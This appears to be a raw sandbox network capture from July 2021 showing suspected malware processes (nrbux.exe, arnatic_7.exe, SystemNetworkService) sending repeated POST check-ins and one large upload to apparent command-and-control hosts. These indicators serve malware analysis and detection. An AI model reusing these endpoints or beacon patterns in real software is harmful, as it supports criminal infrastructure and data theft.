                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:20:43 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b06fd900007cd6f31e1000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=g8Q2MHd6QQ35hIrF1Te6r9BLE4VLcc5tH%2BDzc40TfAO7CfWZtJFKxGHLWH%2FmbPRwL5PJf%2Bfpla7hbEuqjdTCmDHPAMDUZGxtP8GuEtSMZc5%2F3R%2F4MpzMNTABuNhLaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861cf95d507cd6-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:20:54 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b098d100007ceebba71000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=TkA%2BpG%2B%2BIPA0wJt9YKpZ3rAbdWOhf116Tlc9y0NYrLOFuRNBYYF5xf8gTVbRV%2FVlGCqPygJMRox3GhsrK6EI6eQ156dBXWuxoXIzGY9DxJc2xFtP%2BmDJHEOFMHl9xA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861d3aeb287cee-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:21:04 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b0c2080000f15e1cba0000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=A3wUlcTa%2FPINV6qtudD%2BEkFoc3HeU1ZhadtZ9Jw83lfC6F8gSpWaQWhIO4MUDNA%2FGdDkXbmvTynh6GeKz6duwUYsatRUXZeHLCehHJgoTmckbzuHaf1t%2Fv4OoQQ0rA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861d7cde6bf15e-ARN
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
Process: SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:21:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b0ea0200001e5d6b9cc000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=sl4Ct5VegbSaQ2RLaX8aNhAzAo9NWOuPdoEAxGtaw2dccerKFu72Bh%2Bt3byRasNuKLWIZPISZ9LbBH0pm6K9mSLCx%2FqXL0QnAqCUIm8awpe%2BArKMXkdIiUNXXTVPag%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66861dbcbaa91e5d-MUC
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

POST http://iw.gamegame.info/report7.4.php
Process: SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:21:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b112d400001e65ff121000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=S33U6XQeLKtBz2CVdpvA9aL5Nkkfadtts8Mn1A0TS9DKzLAc49DbfmPXooBZm%2FNawiP8B3UEXf2PQ17dCDi%2Bbzel0cA%2Fwi2RqLSs0YBgx0m%2FM57iTTXtmYIaiI96Nw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66861dfe18241e65-MUC
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

POST http://iw.gamegame.info/report7.4.php
Process: SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:21:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b13b3b0000d91d593ea000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=OruBvLe%2FkwNEPka2b0df1E6dSqW49kgEvpWYNb%2FatOfdBOtn1kZtjTAAl%2F7FBW4vmGI2vhA3hI88j%2ByfIKUENBd5txwxx02TmfvgioTYh18NfkAe190FAyv%2FQb6l6A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66861e3ece0cd91d-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

POST http://185.215.113.55/t5BnOoke2/index.php
Process: nrbux.exe
Remote address: 185.215.113.55:80
Request
POST /t5BnOoke2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.55
Content-Length: 84
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:21:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8

POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
Process: nrbux.exe
Remote address: 185.215.113.55:80
Request
POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ec01b39d03ce886c2c15019bf5bdd886
Host: 185.215.113.55
Content-Length: 89453
Cache-Control: no-cache

POST http://iw.gamegame.info/report7.4.php
Process: SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:21:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b1633900001e659e397000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=1%2FHoWxYWiAHiEjQIwnLwGCYU68D3L%2BeIwZEFDg1UVZilmAVGi1Ay56HrkPrHcGdOVAUgvSthAsslkHnrbqlwAwjmPkvReDoSEJvnf%2F3%2B5P6zKNiyOEyudIC8VodM4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66861e7ec9c11e65-MUC
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:21:56 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b18b0400001e61be8e4000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=IWx2iX5XkqfQNg2Xk2xMBHfmCVIikhY3Ub1bNiZQ2LDoiQtT9R0GUoNUIlYJNmPyFpXQN8bf2BSwEuH2cqqOhuMEvjVihZ64mOwAgOz6hpC%2BzAwU8s12nBBT7EvaZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861ebe6f871e61-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:22:06 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b1b2e500007ceead1bb000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=sXtI%2FyIVAugYiDa49IP53aCM4x7apBY%2BlHMsOMQkxWbmNcxIepEmXNvbpdQwU2Q%2BdseMpkZing80fyZv28YdkJeaSX6nef5rxqvzlwoJCVyYbY%2B9fgSxW3dHAxiAIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861efe3b247cee-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:22:16 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b1db3900001ba5a7034000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=lHQ1iiKh3X4T5BgmX7xwrCPM0K171wKZqOHAAIEISq30e9CWRMYLHUI2Ut3XOKQATomPwEJeWv8PhNXKFyB6QdZJY5XGUkXrZru1y7OqjuahmpWlzrkEhI2hAB39Og%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861f3ece951ba5-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:22:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b20423000009d2ea37b000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=WKIYXskTOgL8NIz3fron%2BY3ce90TYN0txTL5qsAUc3YmTuaTaU14AZQJDgwlqPVGMujJ%2FPGkcjUokdLws4FyCXesztWoiyws3QzfplPpjT6yZ5qwHqw1hvq66mLIfA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66861f803a3b09d2-MIA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

POST http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:22:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b22d950000228d57979000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=2XGOoBSb4ENAeIM7wIYIbDTWCBIVoRM7D4iMkrl1MkVsvqCZWySY6DRx%2BreI%2F74UFTlb3jp9LeiGdomzEPLf%2F7EOA323Zk6Tx4Vn5vzIKFMt1UAEHdu2mLqDTLorHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66861fc288ef228d-MIA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

POST http://185.215.113.55/t5BnOoke2/index.php
nrbux.exe
Remote address: 185.215.113.55:80
Request
POST /t5BnOoke2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.55
Content-Length: 84
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:22:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8

POST http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:22:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
